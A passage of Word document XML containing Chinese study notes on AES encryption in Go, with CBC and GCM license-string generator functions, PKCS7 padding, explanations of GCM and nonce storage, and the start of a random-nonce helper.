        <w:t>// Here, we use a simple example with zeroes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C9134" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// In production, use crypto/rand or a similar package for generating secure random numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B606B" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731EC242" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Create a CBC encrypter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F5290" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>mode := cipher.NewCBCEncrypter(c, iv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF506E" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1D5804" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Encrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C652F1" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>out := make([]byte, len(plaintext))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168B7F3" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>mode.CryptBlocks(out, plaintext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965BB4C" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECF1A2B" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return hex.EncodeToString(out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2BA901" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF6CD9" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFF805F" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func LicenseGeneratorGCM(ip, time, key string) string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC978D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Create cipher block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7ECA4D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>c, err := aes.NewCipher([]byte(key))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E23A9C9" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19357E9B" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3446BA14" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D6CD5" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5324D981" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Use GCM for authenticated encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B9178F" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>gcm, err := cipher.NewGCM(c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C99FCB" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C03F63B" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F09F3DA" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDCB170" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8FD4DA" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Concatenate IP and Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E58DC1" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>plaintext := []byte(ip + time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C07CB" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7243D90D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Nonce should be unique for every encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEAAD8D" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nonce := make([]byte, gcm.NonceSize())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5910CE5E" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// You should use a secure random number generator to fill the nonce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9C54F" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Here, we use a simple example with zeroes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA36DBE" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// In production, use crypto/rand or a similar package for generating secure random numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B61094" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA6CFAA" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// Encrypt and authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507974B0" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>out := gcm.Seal(nil, nonce, plaintext, nil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E6C29" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33085423" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return hex.EncodeToString(out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61908420" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029AF6C" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3B7602" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// pkcs7Pad pads the input to a multiple of blockSize using PKCS7 padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B1846" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func pkcs7Pad(data []byte, blockSize int) []byte {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F0CB9" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>padding := blockSize - (len(data) % blockSize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7E023" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>padText := bytes.Repeat([]byte{byte(padding)}, padding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E6AC5" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return append(data, padText...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A7973" w14:textId="6362C90D" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD702E5" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B1697A" w14:textId="457019DC" w:rsidR="001D7388" w:rsidRDefault="00236217" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分组密码模式</w:t>
      </w:r>
      <w:r w:rsidR="002D44BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：不需要指定</w:t>
      </w:r>
      <w:r w:rsidR="002D44BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>padding</w:t>
      </w:r>
      <w:r w:rsidR="002D44BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式，该分组密码自己支持不定长</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3311A9C2" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7FBC47" w14:textId="5411E563" w:rsidR="001D7388" w:rsidRPr="00236217" w:rsidRDefault="00236217" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GCM</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Galois/Counter Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）是一种分组密码模式，通常用于加密和认证。</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">GCM </w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提供了同时进行加密和认证的功能，是一种被广泛使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> AEAD</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Authenticated Encryption with Associated Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00236217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）模式</w:t>
      </w:r>
      <w:r w:rsidR="009C36E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009C36E7" w:rsidRPr="009C36E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不需要指定</w:t>
      </w:r>
      <w:r w:rsidR="009C36E7" w:rsidRPr="009C36E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>padding</w:t>
      </w:r>
      <w:r w:rsidR="009C36E7" w:rsidRPr="009C36E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方式，该分组密码自己支持不定长</w:t>
      </w:r>
      <w:r w:rsidRPr="009C36E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32353375" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F164B03" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nonce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要在加密和解密过程中保持一致，因此通常需要将其与密文一起存储。在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GCM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式进行解密时，需要提供相同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nonce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一种常见方式是将其与密文一起传输，并在解密时提取出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45489E10" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="585D681C" w14:textId="0DE49BEA" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nonce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的随机值，它通常不需要保密，可以被传输并存储在加密的消息中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E2235" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E5E018" w14:textId="1F92F77F" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成随机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8E1AD" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201BA64D" w14:textId="77777777" w:rsidR="00380023" w:rsidRPr="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B705661" w14:textId="2026CACE" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"crypto/rand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"encoding/hex"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"log"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>generateNonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() ([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>byte, error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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t xml:space="preserve">nonce := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>make</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">byte, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12</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t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
